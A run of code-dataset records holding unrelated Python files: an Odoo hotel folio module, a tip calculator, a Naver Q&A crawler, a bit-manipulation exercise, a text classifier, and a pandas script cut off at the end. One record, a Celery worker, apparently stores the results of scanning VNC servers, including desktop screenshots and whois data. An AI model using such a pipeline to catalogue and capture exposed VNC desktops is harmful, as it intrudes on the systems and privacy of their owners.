checkout for more or equal\n hours , which configured in company as additional hours than it would be consider as full days\n ---------------------------------------------------------------------------------------------\n @param self : object pointer\n @return : Duration and checkout_date\n '''\n company_obj = self.env['res.company']\n configured_addition_hours = 0\n company_ids = company_obj.search([])\n if company_ids.ids:\n configured_addition_hours = company_ids[0].additional_hours\n myduration = 0 \n if self.checkin_date and self.checkout_date:\n chkin_dt = datetime.datetime.strptime(self.checkin_date, '%Y-%m-%d %H:%M:%S')\n chkout_dt = datetime.datetime.strptime(self.checkout_date, '%Y-%m-%d %H:%M:%S')\n dur = chkout_dt - chkin_dt\n myduration = dur.days\n if configured_addition_hours > 0:\n additional_hours = abs((dur.seconds / 60) / 60)\n if additional_hours >= configured_addition_hours:\n myduration += 1\n self.duration = myduration\n\n @api.model\n def create(self, vals,check=True):\n \"\"\"\n Overrides orm create method.\n @param self: The object pointer\n @param vals: dictionary of fields value.\n @return: new record set for hotel folio.\n \"\"\"\n tmp_room_lines = vals.get('room_lines', [])\n vals['order_policy'] = vals.get('hotel_policy', 'manual')\n if not 'service_lines' and 'folio_id' in vals:\n vals.update({'room_lines':[]})\n folio_id = super(hotel_folio, self).create(vals)\n for line in (tmp_room_lines):\n line[2].update({'folio_id':folio_id})\n vals.update({'room_lines':tmp_room_lines})\n folio_id.write(vals)\n else:\n folio_id = super(hotel_folio, self).create(vals)\n return folio_id\n\n\n @api.onchange('warehouse_id')\n def onchange_warehouse_id(self):\n '''\n When you change warehouse it will update the warehouse of\n the hotel folio as well\n ----------------------------------------------------------\n @param self : object pointer\n '''\n for folio in self:\n order = folio.order_id\n x = order.onchange_warehouse_id(folio.warehouse_id.id)\n return x\n\n\n @api.onchange('partner_id')\n def onchange_partner_id(self):\n '''\n When you change partner_id it will update the partner_invoice_id,\n partner_shipping_id and pricelist_id of the hotel folio as well\n ---------------------------------------------------------------\n @param self : object pointer\n '''\n if self.partner_id:\n partner_rec = self.env['res.partner'].browse(self.partner_id.id)\n order_ids = [folio.order_id.id for folio in self]\n if not order_ids:\n self.partner_invoice_id = partner_rec.id\n self.partner_shipping_id = partner_rec.id \n self.pricelist_id = partner_rec.property_product_pricelist.id\n raise Warning('Not Any Order For %s ' % (partner_rec.name))\n else:\n self.partner_invoice_id = partner_rec.id\n self.partner_shipping_id = partner_rec.id\n self.pricelist_id = partner_rec.property_product_pricelist.id\n\n @api.multi \n def button_dummy(self):\n '''\n @param self : object pointer\n '''\n for folio in self:\n order = folio.order_id\n x = order.button_dummy()\n return x\n\n\n @api.multi\n def action_invoice_create(self,grouped=False, states=['confirmed', 'done']):\n '''\n @param self : object pointer\n '''\n order_ids = [folio.order_id.id for folio in self]\n sale_obj = self.env['sale.order'].browse(order_ids)\n invoice_id = sale_obj.action_invoice_create(grouped=False,states=['confirmed', 'done'])\n for line in self:\n values = {\n 'invoiced': True,\n 'state': 'progress' if grouped else 'progress',\n }\n line.write(values)\n return invoice_id\n\n\n @api.multi\n def action_invoice_cancel(self):\n '''\n @param self : object pointer\n '''\n order_ids = [folio.order_id.id for folio in self]\n sale_obj = self.env['sale.order'].browse(order_ids)\n res = sale_obj.action_invoice_cancel()\n for sale in self:\n for line in sale.order_line:\n line.write({'invoiced': 'invoiced'})\n sale.write({'state':'invoice_except'})\n return res\n\n @api.multi\n def action_cancel(self):\n '''\n @param self : object pointer\n '''\n order_ids = [folio.order_id.id for folio in self]\n sale_obj = self.env['sale.order'].browse(order_ids)\n rv = sale_obj.action_cancel()\n wf_service = netsvc.LocalService(\"workflow\")\n for sale in self:\n for pick in sale.picking_ids:\n wf_service.trg_validate(self._uid, 'stock.picking', pick.id, 'button_cancel', self._cr)\n for invoice in sale.invoice_ids:\n wf_service.trg_validate(self._uid, 'account.invoice', invoice.id, 'invoice_cancel', self._cr)\n sale.write({'state':'cancel'})\n return rv\n\n @api.multi\n def action_wait(self):\n '''\n @param self : object pointer\n '''\n sale_order_obj = self.env['sale.order']\n res = False\n for o in self:\n sale_obj = sale_order_obj.browse([o.order_id.id])\n res = sale_obj.action_wait()\n if (o.order_policy == 'manual') and (not o.invoice_ids):\n o.write({'state': 'manual'})\n else:\n o.write({'state': 'progress'})\n return res\n\n\n @api.multi\n def test_state(self,mode):\n '''\n @param self : object pointer\n @param mode : state of workflow\n '''\n write_done_ids = []\n write_cancel_ids = []\n if write_done_ids:\n test_obj = self.env['sale.order.line'].browse(write_done_ids)\n test_obj.write({'state': 'done'})\n if write_cancel_ids:\n test_obj = self.env['sale.order.line'].browse(write_cancel_ids)\n test_obj.write({'state': 'cancel'})\n\n @api.multi\n def action_ship_create(self):\n '''\n @param self : object pointer\n '''\n for folio in self:\n order = folio.order_id\n x = order.action_ship_create()\n return x\n\n @api.multi\n def action_ship_end(self):\n '''\n @param self : object pointer\n '''\n order_ids = [folio.order_id.id for folio in self]\n for order in self:\n order.write ({'shipped':True})\n\n @api.multi\n def has_stockable_products(self):\n '''\n @param self : object pointer\n '''\n for folio in self:\n order = folio.order_id\n x = order.has_stockable_products()\n return x\n\n @api.multi\n def action_cancel_draft(self):\n '''\n @param self : object pointer\n '''\n if not len(self._ids):\n return False\n query = \"select id from sale_order_line where order_id IN %s and state=%s\"\n self._cr.execute(query, (tuple(self._ids), 'cancel'))\n cr1 = self._cr\n line_ids = map(lambda x: x[0],cr1.fetchall())\n self.write({'state': 'draft', 'invoice_ids': [], 'shipped': 0})\n sale_line_obj = self.env['sale.order.line'].browse(line_ids)\n sale_line_obj.write({'invoiced': False, 'state': 'draft', 'invoice_lines': [(6, 0, [])]})\n wf_service = netsvc.LocalService(\"workflow\")\n for inv_id in self._ids:\n # Deleting the existing instance of workflow for SO\n wf_service.trg_delete(self._uid,'sale.order', inv_id,self._cr)\n wf_service.trg_create(self._uid,'sale.order', inv_id,self._cr)\n for (id, name) in self.name_get():\n message = _(\"The sales order '%s' has been set in draft state.\") % (name,)\n self.log(message)\n return True\n\nclass hotel_folio_line(models.Model):\n\n @api.one\n def copy(self,default=None):\n '''\n @param self : object pointer\n @param default : dict of default values to be set\n '''\n return self.env['sale.order.line'].copy(default=default)\n\n @api.multi\n def _amount_line(self,field_name, arg):\n '''\n @param self : object pointer\n @param field_name: Names of fields.\n @param arg: User defined arguments\n '''\n return self.env['sale.order.line']._amount_line(field_name, arg)\n\n @api.multi\n def _number_packages(self,field_name, arg):\n '''\n @param self : object pointer\n @param field_name: Names of fields.\n @param arg: User defined arguments\n '''\n return self.env['sale.order.line']._number_packages(field_name, arg)\n\n @api.model\n def _get_checkin_date(self):\n if 'checkin_date' in self._context:\n return self._context['checkin_date']\n return time.strftime('%Y-%m-%d %H:%M:%S')\n#\n @api.model\n def _get_checkout_date(self):\n if 'checkin_date' in self._context:\n return self._context['checkout_date']\n return time.strftime('%Y-%m-%d %H:%M:%S')\n\n _name = 'hotel.folio.line'\n _description = 'hotel folio1 room line'\n\n order_line_id = fields.Many2one('sale.order.line',string='Order Line' ,required=True, delegate=True, ondelete='cascade')\n folio_id = fields.Many2one('hotel.folio',string='Folio', ondelete='cascade')\n checkin_date = fields.Datetime('Check In', required=True,default = _get_checkin_date)\n checkout_date = fields.Datetime('Check Out', required=True,default = _get_checkout_date)\n\n @api.model\n def create(self,vals,check=True):\n \"\"\"\n Overrides orm create method.\n @param self: The object pointer\n @param vals: dictionary of fields value.\n @return: new record set for hotel folio line.\n \"\"\"\n if 'folio_id' in vals:\n folio = self.env[\"hotel.folio\"].browse(vals['folio_id'])\n vals.update({'order_id':folio.order_id.id})\n return super(models.Model, self).create(vals)\n\n\n @api.multi\n def unlink(self):\n \"\"\"\n Overrides orm unlink method.\n @param self: The object pointer\n @return: True/False.\n \"\"\"\n sale_line_obj = self.env['sale.order.line']\n for line in self:\n if line.order_line_id:\n sale_unlink_obj = sale_line_obj.browse([line.order_line_id.id])\n sale_unlink_obj.unlink()\n return super(hotel_folio_line, self).unlink()\n\n @api.multi\n def uos_change(self, product_uos, product_uos_qty=0, product_id=None):\n '''\n @param self : object pointer\n '''\n for folio in self:\n line = folio.order_line_id\n x = line.uos_change(product_uos, product_uos_qty=0, product_id=None)\n return x\n\n @api.multi\n def product_id_change(self,pricelist, product, qty=0,\n uom=False, qty_uos=0, uos=False, name='', partner_id=False,\n lang=False, update_tax=True, date_order=False):\n '''\n @param self : object pointer\n '''\n line_ids = [folio.order_line_id.id for folio in self]\n if product:\n sale_line_obj = self.env['sale.order.line'].browse(line_ids)\n return sale_line_obj.product_id_change(pricelist, product, qty=0,\n uom=False, qty_uos=0, uos=False, name='', partner_id=partner_id,\n lang=False, update_tax=True, date_order=False)\n\n @api.multi\n def product_uom_change(self, pricelist, product, qty=0,\n uom=False, qty_uos=0, uos=False, name='', partner_id=False,\n lang=False, update_tax=True, date_order=False):\n '''\n @param self : object pointer\n '''\n if product:\n return self.product_id_change(pricelist, product, qty=0,\n uom=False, qty_uos=0, uos=False, name='', partner_id=partner_id,\n lang=False, update_tax=True, date_order=False)\n\n\n @api.onchange('checkin_date','checkout_date')\n def on_change_checkout(self):\n '''\n When you change checkin_date or checkout_date it will checked it\n and update the qty of hotel folio line\n -----------------------------------------------------------------\n @param self : object pointer\n '''\n if not self.checkin_date:\n self.checkin_date = time.strftime('%Y-%m-%d %H:%M:%S')\n if not self.checkout_date:\n self.checkout_date = time.strftime('%Y-%m-%d %H:%M:%S')\n qty = 1\n if self.checkout_date < self.checkin_date:\n raise except_orm(_('Warning'),_('Checkout must be greater or equal to checkin date'))\n if self.checkin_date:\n diffDate = datetime.datetime(*time.strptime(self.checkout_date, '%Y-%m-%d %H:%M:%S')[:5]) - datetime.datetime(*time.strptime(self.checkin_date, '%Y-%m-%d %H:%M:%S')[:5])\n qty = diffDate.days\n if qty == 0:\n qty = 1\n self.product_uom_qty = qty\n\n\n @api.multi\n def button_confirm(self):\n '''\n @param self : object pointer\n '''\n for folio in self:\n line = folio.order_line_id\n x = line.button_confirm()\n return x\n\n @api.multi\n def button_done(self):\n '''\n @param self : object pointer\n '''\n line_ids = [folio.order_line_id.id for folio in self]\n sale_line_obj = self.env['sale.order.line'].browse(line_ids)\n res = sale_line_obj.button_done()\n wf_service = netsvc.LocalService(\"workflow\")\n res = self.write({'state':'done'})\n for line in self:\n wf_service.trg_write(self._uid, 'sale.order', line.order_line_id.order_id.id, self._cr)\n return res\n\n @api.one\n def copy_data(self,default=None):\n '''\n @param self : object pointer\n @param default : dict of default values to be set\n '''\n line_id = self.order_line_id.id \n sale_line_obj = self.env['sale.order.line'].browse(line_id)\n return sale_line_obj.copy_data(default=default)\n\n\nclass hotel_service_line(models.Model):\n\n @api.one\n def copy(self, default=None):\n '''\n @param self : object pointer\n @param default : dict of default values to be set\n '''\n line_id = self.service_line_id.id\n sale_line_obj = self.env['sale.order.line'].browse(line_id)\n return sale_line_obj.copy(default=default)\n\n @api.multi\n def _amount_line(self,field_name, arg):\n '''\n @param self : object pointer\n @param field_name: Names of fields.\n @param arg: User defined arguments\n '''\n for folio in self:\n line = folio.service_line_id\n x = line._amount_line(field_name, arg)\n return x\n\n @api.multi\n def _number_packages(self,field_name, arg):\n '''\n @param self : object pointer\n @param field_name: Names of fields.\n @param arg: User defined arguments\n '''\n for folio in self:\n line = folio.service_line_id\n x = line._number_packages(field_name, arg)\n return x\n\n\n _name = 'hotel.service.line'\n _description = 'hotel Service line'\n \n service_line_id = fields.Many2one('sale.order.line','Service Line', required=True, delegate=True, ondelete='cascade')\n folio_id = fields.Many2one('hotel.folio','Folio',ondelete='cascade')\n\n @api.model\n def create(self,vals,check=True):\n \"\"\"\n Overrides orm create method.\n @param self: The object pointer\n @param vals: dictionary of fields value.\n @return: new record set for hotel service line.\n \"\"\"\n\n if 'folio_id' in vals:\n folio = self.env['hotel.folio'].browse(vals['folio_id'])\n vals.update({'order_id':folio.order_id.id})\n return super(models.Model, self).create(vals)\n\n @api.multi\n def unlink(self):\n \"\"\"\n Overrides orm unlink method.\n @param self: The object pointer\n @return: Tru/False.\n \"\"\"\n sale_line_obj = self.env['sale.order.line']\n for line in self:\n if line.service_line_id:\n sale_unlink_obj = sale_line_obj.browse([line.service_line_id.id])\n sale_unlink_obj.unlink()\n return super(hotel_service_line, self).unlink()\n\n @api.multi\n def product_id_change(self,pricelist, product, qty=0,\n uom=False, qty_uos=0, uos=False, name='', partner_id=False,\n lang=False, update_tax=True, date_order=False):\n '''\n @param self : object pointer\n '''\n line_ids = [folio.order_line_id.id for folio in self]\n if product:\n sale_line_obj = self.env['sale.order.line'].browse(line_ids)\n return sale_line_obj.product_id_change(pricelist, product, qty=0,\n uom=False, qty_uos=0, uos=False, name='', partner_id=partner_id,\n lang=False, update_tax=True, date_order=False)\n\n\n @api.multi\n def product_uom_change(self, pricelist, product, qty=0,\n uom=False, qty_uos=0, uos=False, name='', partner_id=False,\n lang=False, update_tax=True, date_order=False):\n '''\n @param self : object pointer\n '''\n if product:\n return self.product_id_change(pricelist, product, qty=0,\n uom=False, qty_uos=0, uos=False, name='', partner_id=partner_id,\n lang=False, update_tax=True, date_order=False)\n\n @api.onchange('checkin_date','checkout_date')\n def on_change_checkout(self):\n '''\n When you change checkin_date or checkout_date it will checked it\n and update the qty of hotel service line\n -----------------------------------------------------------------\n @param self : object pointer\n '''\n\n if not self.checkin_date:\n self.checkin_date = time.strftime('%Y-%m-%d %H:%M:%S')\n if not self.checkout_date:\n self.checkout_date = time.strftime('%Y-%m-%d %H:%M:%S')\n qty = 1\n if self.checkout_date < self.checkin_date:\n raise Warning('Checkout must be greater or equal checkin date')\n if self.checkin_date:\n diffDate = datetime.datetime(*time.strptime(self.checkout_date, '%Y-%m-%d %H:%M:%S')[:5]) - datetime.datetime(*time.strptime(self.checkin_date, '%Y-%m-%d %H:%M:%S')[:5])\n qty = diffDate.days\n self.product_uom_qty = qty\n\n @api.multi \n def button_confirm(self):\n '''\n @param self : object pointer\n '''\n for folio in self:\n line = folio.service_line_id\n x = line.button_confirm()\n return x\n\n @api.multi\n def button_done(self):\n '''\n @param self : object pointer\n '''\n for folio in self:\n line = folio.service_line_id\n x = line.button_done()\n return x\n\n @api.one\n def copy_data(self,default=None):\n '''\n @param self : object pointer\n @param default : dict of default values to be set\n '''\n line_id = self.service_line_id.id\n sale_line_obj = self.env['sale.order.line'].browse(line_id)\n return sale_line_obj.copy_data(default=default)\n\nclass hotel_service_type(models.Model):\n\n _name = \"hotel.service.type\"\n _description = \"Service Type\"\n\n ser_id = fields.Many2one('product.category','category', required=True, delegate=True, select=True, ondelete='cascade')\n\n\nclass hotel_services(models.Model):\n\n _name = 'hotel.services'\n _description = 'Hotel Services and its charges'\n\n service_id = fields.Many2one('product.product','Service_id',required=True, ondelete='cascade', delegate=True)\n\nclass res_company(models.Model):\n\n _inherit = 'res.company'\n\n additional_hours = fields.Integer('Additional Hours', help=\"Provide the min hours value for check in, checkout days, whatever the hours will be provided here based on that extra days will be calculated.\")\n\n## vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"hotel/models/hotel.py","file_name":"hotel.py","file_ext":"py","file_size_in_byte":27560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"337651472","text":"# CTI-110\r\n# P2HW2 - Tip Tax Total\r\n# Elianna Hunter\r\n# 2/16/2018\r\n\r\nfoodCharge = float(input(\"Please enter the cost of the food: \") )\r\ntip = 0.18 * foodCharge\r\nsalesTax = 0.07 * foodCharge\r\ntotal = foodCharge + tip + salesTax\r\nprint(\"Food Charge: $\" + format( foodCharge, \",.2f\"), \"Tip: $\" + \\\r\n format(tip, \",.2f\" ), \"Sales Tax: $\" + format(salesTax, \",.2f\"), \\\r\n \"Total: $\" + format(total, \",.2f\"), sep = \"\\n\" )\r\ninput(\"Press enter to exit\" )\r\n\r\n","sub_path":"P2HW2_TipTaxTotal_HunterElianna.py","file_name":"P2HW2_TipTaxTotal_HunterElianna.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"417321030","text":"from insights.parsers import lvm\n\nWARNINGS_CONTENT = \"\"\"\nWARNING\nvalid data 1\nChecksum Error\nvalid data 2\n Failed to write\n Attempt To Close Device\nvalid data 3\n\"\"\".strip()\n\nWARNINGS_FOUND = \"\"\"\nWARNING\nChecksum Error\n Failed to write\n Attempt To Close Device\n\"\"\".strip()\n\n\ndef test_replace_spaces_in_keys():\n data = lvm.replace_spaces_in_keys(\"Lock Args LV Tags\")\n assert data == \"Lock_Args LV Tags\"\n\n\ndef test_find_warnings():\n data = [l for l in lvm.find_warnings(WARNINGS_CONTENT.splitlines())]\n assert len(data) == len(WARNINGS_FOUND.splitlines())\n assert data == WARNINGS_FOUND.splitlines()\n","sub_path":"insights/parsers/tests/test_lvm.py","file_name":"test_lvm.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"9463278","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pyautogui\nimport openpyxl\nimport os\n\nkeyword = pyautogui.prompt(text='검색어를 입력하세요', title='Message')\npage = int(pyautogui.prompt(text='몇 페이지까지 크롤링 할까요?', title='Message'))\n\n# 저장 경로\nsave_path = r\"C:\\Users\\스타트코딩\\Desktop\\웹크롤링\\5주차\\결과.xlsx\"\n\n# 엑셀 생성 (파일이 없으면 만들고, 있으면 만들지 않는다)\nif not os.path.exists(save_path):\n openpyxl.Workbook().save(save_path)\n\n# 엑셀 불러오기\nworkbook = openpyxl.load_workbook(save_path)\n\n# 시트 생성\nsheet = workbook.create_sheet(keyword)\n\nfor i in range(1, page + 1):\n url = f\"https://kin.naver.com/search/list.nhn?query={keyword}&page={i}\"\n\n print(f'=================={i}번째 페이지 입니다.====================')\n response = requests.get(url)\n response.raise_for_status()\n html = response.text\n\n soup = BeautifulSoup(html, 'html.parser')\n\n lists = soup.select('ul.basic1 > li')\n\n # 현재 행 번호\n row_num = 1 + (i-1) * 10\n\n for li in lists:\n link_url = li.select_one('dl > dt > a').attrs['href']\n\n response_new = requests.get(link_url)\n response_new.raise_for_status()\n html_new = response_new.text\n soup_new = BeautifulSoup(html_new, 'html.parser')\n title = soup_new.select_one(\"#content div.c-heading__title-inner > div.title\").get_text(strip=True)\n content = soup_new.select(\"#content div.c-heading__content\")\n \n # 있으면 [content의 html객체]\n # 없으면 [] 빈리스트\n \n if len(content) == 1:\n content = content[0].get_text(strip=True)\n else:\n content = \"없음\"\n\n sheet[f'A{row_num}'] = title\n sheet[f'B{row_num}'] = content\n\n workbook.save(save_path)\n row_num = row_num + 1\n","sub_path":"5주차/naver_qna_6.py","file_name":"naver_qna_6.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"225958368","text":"#You are given two 32-bit numbers, N and M, and two bit positions,\n#i and j. Write a method to insert M into N such that M starts\n#at bit j and ends at bit i\n\ndef insertion(N, M, i, j):\n y = 0\n start = (len(N)-j-1)\n end = len(N)-i\n print(start, end)\n for x in range(start, end):\n N[x] = M[y]\n y += 1\n return N\n\nN = [1,0,0,0,0,0,0,0,0,0,0]\nM = [1,0,0,1,1]\ni = 2\nj = 6\n\n#inserted = insertion(N, M, i, j)\n#print(inserted)\n\n#1 Clear the bits j through i in N\n#2 Shift M so that it lines up with bits j through i\n#3 Merge M and N\n\ndef bitInsertion(N, M, i, j):\n allOnes = 0b11111111111\n leftOnes = allOnes << (j+1)\n #Shift the one over by 1 extra, then subtract 1, to make all prev digits 1\n rightOnes = ((0b1 << i)-1)\n mask = leftOnes | rightOnes\n cleared = N & mask\n #shift the M into place\n shifted = (M << i)\n result = (cleared | shifted)\n return(bin(result))\n\nNbit = 0b10000000000\nMbit = 0b10011\nibit = 2\njbit = 6\n\nresult = bitInsertion(Nbit, Mbit, ibit, jbit)\nprint(result)\n","sub_path":"CrackingTheCodingInterview/5BitManipulation/5.1Insertion.py","file_name":"5.1Insertion.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"57535896","text":"from nltk.corpus import stopwords as sw\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import f1_score\r\nfrom sklearn.decomposition import TruncatedSVD\r\nimport numpy as np\r\nimport pandas as pd\r\nimport nltk\r\nimport re\r\nimport time\r\n\r\n\r\nstart_time = time.time()\r\n\r\n#load the dataset\r\ndf = pd.read_csv(\"development.csv\")\r\ndf_eval = pd.read_csv(\"evaluation.csv\")\r\ntrain_documents = df[\"text\"]\r\neval_documents = df_eval[\"text\"]\r\nlabels = np.array(df[\"class\"])\r\n\r\n\r\n#data exploration\r\ncv = CountVectorizer(decode_error = 'ignore')\r\ncv.fit(train_documents)\r\nwords = cv.get_feature_names()\r\n\r\n#write words on file\r\nwith open('words.txt', 'w', encoding=\"utf-8\") as fp:\r\n fp.write('words')\r\n for w in words:\r\n fp.write(\"%s\\n\" %(str(w)))\r\n\r\nprint(\"words written on words.txt\")\r\n\r\n\r\n#stemmer definition and analyzer function\r\nit_stemmer = nltk.stem.SnowballStemmer('italian')\r\n\r\n#this function is used to find words that contain numbers\r\ndef hasNumbers(inputString):\r\n return bool(re.search(r'\\d', inputString))\r\n\r\n#our analyzer stems words and substitutes number containing tokens with the \"NNN\"\r\n#that is eventually removed by the inclusion of \"NNN\" in our stopwords.\r\ndef analyze_stem(word, stemmer):\r\n if not hasNumbers(word):\r\n return stemmer.stem(word)\r\n else:\r\n return \"NNN\"\r\n\r\n#we build a class for a costum vectorizer that implements a stemmer as an analyzer\r\nclass StemmedTfidfVectorizer(TfidfVectorizer):\r\n def build_analyzer(self):\r\n analyzer = super(StemmedTfidfVectorizer, self).build_analyzer()\r\n return lambda doc: ([analyze_stem(w, it_stemmer) for w in analyzer(doc)])\r\n\r\n#TF-IDF extraction\r\nmy_sw = sw.words('italian')\r\nmy_sw.remove('non')\r\nvectorizer_s = StemmedTfidfVectorizer(analyzer=\"word\",\r\n stop_words=my_sw + [\"nnn\"], max_df = 0.3,\r\n min_df = 3, ngram_range = (1,2),\r\n max_features = 30000)\r\nmatrix = vectorizer_s.fit_transform(train_documents)\r\neval_matrix = vectorizer_s.transform(eval_documents)\r\nprint(matrix.shape)\r\nprint(eval_matrix.shape)\r\nprint(\"--- Vectorization time: %s seconds ---\" % (time.time() - start_time))\r\n\r\n#PCA via a trucated SVD\r\nsvd = TruncatedSVD(n_components = 100)\r\nmatrix_svd = svd.fit_transform(matrix)\r\neval_matrix_svd = svd.transform (eval_matrix)\r\nprint(matrix_svd.shape)\r\nprint(eval_matrix_svd.shape)\r\n\r\n## This portion of code has been left commented to demonstrate the validation\r\n## approach used\r\n# #Hold-out testing\r\n# X_train, X_test, y_train, y_test = train_test_split(matrix_svd, labels, test_size=0.20)\r\n# mlp1 = MLPClassifier(hidden_layer_sizes = (125), alpha = 0.001, early_stopping = True, tol = 0.001, n_iter_no_change = 10, activation = 'identity')\r\n# mlp1.fit(X_train, y_train)\r\n# predictions = mlp1.predict(X_test)\r\n# curr_score = f1_score(y_test, predictions, average='weighted')\r\n# print(curr_score)\r\n\r\nprint(\"--- SVD time: %s seconds ---\" % (time.time() - start_time))\r\n# # Parameters tuning\r\n# # The following code has been commented since the computation of the best\r\n# # parameters requires a very long time and has already been performed during the\r\n# # testing procedure.\r\n# # This function also implements cross validation so it is a nice way to test our\r\n# # pipeline\r\n# parameters = {'activation':['tanh', 'relu', 'logistic', 'identity'],\r\n# 'alpha' : 10.0 ** -np.arange(0, 5),\r\n# 'hidden_layer_sizes' : [(100),(125), (100,50), (100, 50, 25), (200,100,50)],\r\n# 'early_stopping': [True], 'tol' :[0.001]}\r\n# clf = GridSearchCV(MLPClassifier(), parameters, n_jobs=-1, cv = 7)\r\n# clf.fit(matrix_svd, labels)\r\n# print(clf.score(matrix_svd, labels))\r\n# print(clf.best_params_)\r\n\r\n#Training and prediction via our MLPClassifier\r\nmlp1 = MLPClassifier(activation = 'identity',\r\n alpha = 0.001,\r\n hidden_layer_sizes = (125),\r\n early_stopping = True, tol = 0.001,\r\n n_iter_no_change = 10,\r\n verbose = True)\r\nmlp1.fit(matrix_svd,labels)\r\npredictions = mlp1.predict(eval_matrix_svd)\r\n\r\n#write on file\r\nwith open ('out1.csv', 'w') as f:\r\n i=0\r\n f.write('Id,Predicted\\n')\r\n for p in predictions:\r\n f.write(\"%d,%s\\n\" %(i,p))\r\n i += 1\r\nprint(\"results written to out1.csv\")\r\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\r\n","sub_path":"Solution1.py","file_name":"Solution1.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"320462529","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n# 2014-08-16 09:24 CEST\n# y0ug\nimport sys\nimport argparse\nimport datetime\nimport subprocess\nimport os\nimport threading\nimport hashlib\nimport tempfile\nimport StringIO\nimport base64\n\nfrom celery import Celery, subtask, group, Task\n\nfrom models.mongo import *\n\napp = Celery()\nimport celeryconfig\napp.config_from_object(celeryconfig)\n\nclass DatabaseTask(Task):\n def __init__(self):\n connect(celeryconfig.DATABASE_URI)\n #super(DatabaseTask, self).__init__()\n\n@app.task(queue=\"result\", base=DatabaseTask)\ndef get_lists_ip_whois(n=100):\n out = []\n servers = Server.objects(whois=None)\n ips = [str(x['ip']) for x in servers[:n]]\n return ips\n\n@app.task(queue=\"result\", base=DatabaseTask)\ndef whois_info_add(infos):\n for k,v in infos.items():\n obj = Server.objects.get(ip=k)\n if not obj.whois or obj.whois is None:\n w = Whois()\n obj.whois = w\n\n obj.whois.load_dic(v)\n obj.save()\n\n@app.task(queue=\"result\", base=DatabaseTask)\ndef vnc_server_add_picture(data):\n info = data['info']\n\n try:\n server = Server.objects.get(ip=info['ip'], port=info['port'])\n #server.last_at = ['exec_at']\n except:\n server = Server()\n server.ip = info['ip']\n server.port = info['port']\n server.save()\n\n log = LogTask()\n log.load_dic(data)\n server.logs.append(log)\n server.save()\n\n if server.vnc is None:\n server.vnc = VncServer()\n\n if log.status != \"ok\":\n server.save()\n return server.serialize()\n\n picture = data['picture']\n #picture = base64.b64decode(data['picture'])\n\n fp = StringIO.StringIO(picture)\n\n screen = Screenshot()\n screen.picture.put(fp)\n screen.save()\n fp.close()\n\n screen.build_thumbnail()\n screen.save()\n\n server.vnc.screenshots.append(screen)\n server.save()\n return server.serialize()\n\n@app.task(queue=\"result\", base=DatabaseTask)\ndef vnc_server_info(results):\n out = []\n for result in results:\n info = result['info']\n\n try:\n server = Server.objects.get(ip=info['ip'], port=info['port'])\n server.last_at = result['exec_at']\n except:\n server = Server()\n server.ip = info['ip']\n server.port = info['port']\n server.save()\n\n log = LogTask()\n log.load_dic(result)\n server.logs.append(log)\n server.save()\n\n if not hasattr(server, \"vnc\") or server.vnc is None:\n server.vnc = VncServer()\n\n\n if log.status != \"ok\":\n continue\n\n server.vnc.load_dic(result['vnc'])\n\n server.save()\n out.append(server.serialize())\n\n return out\n\n@app.task(queue='result', base=DatabaseTask)\ndef dmap(it, callback):\n # Map a callback over an iterator and return as a group\n callback = subtask(callback)\n return group(callback.clone([arg,]) for arg in it)()\n\nif __name__ == \"__main__\":\n pass\n\n\n","sub_path":"worker/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"68622415","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 15 18:21:17 2021\n\n@author: antonio\n\"\"\"\n\nimport pandas as pd #for creating the spreadsheet \nimport numpy as np #for nan\nimport re as re #for sub\n\n\n#funciones\n\n#esta funcion debe llamarse primero\ndef cleandf(df, total_nan = False): #funcion para dejar la base de datos limpia y con los indices de columnas adecuados\n \n dfr = df.copy()\n max_title = 200 #Para quitar los encabezados con descripciones largas\n \n for i in range(0, len(dfr.index)): #Esto limpia de espacios y enters todo el dataframe\n \n for j in range(0, len(dfr.columns)): \n \n if type(dfr.iloc[i,j]) == str: \n \n dfr.iloc[i,j] = ' '.join(dfr.iloc[i,j].split()) #Esto limpia todas los strings de espacios de sobra y \"\\n\"\n \n if i < 3 and len(dfr.iloc[i,j]) > max_title: #revisando las primeras filas, quitamos los titulos demasiado largos\n\n dfr.iloc[i,j] = np.nan\n \n aux_dfr = dfr.iloc[:2,:] #Usamos un dataframe auxiliar para limpiar los nombres de las columnas\n \n aux_dfr = aux_dfr.fillna(method = \"ffill\", axis = 1)\n aux_dfr = aux_dfr.fillna(method = \"ffill\", axis = 0)\n dfr = dfr.drop([0, 1, 2]) #y borramos las filas de los encabezados del excel para tener algo mas limpio\n \n mult_index = aux_dfr.T #Transpuesta\n dfr.columns = pd.MultiIndex.from_frame(mult_index) #reindexea con multiindex de 2 niveles \n \n if total_nan == True:\n \n dfr = dfr.replace(\"NR\", np.nan) #reemplaza nr con valores nan\n \n dfr = dfr.loc[:,~dfr.columns.duplicated()] #Comentar esto correctamente, creo que quita los duplicados de nombres de las columnas\n dfr.reset_index(inplace = True, drop = True)\n dfr = dfr.sort_index()\n \n return dfr\n\n\ndef subdf(df, sheet): #obtener las columnas que nos interesen\n #usar despues de cleandf necesariamente\n name_columns =[\"Ref ID\", \"1st Author\"]\n dfr 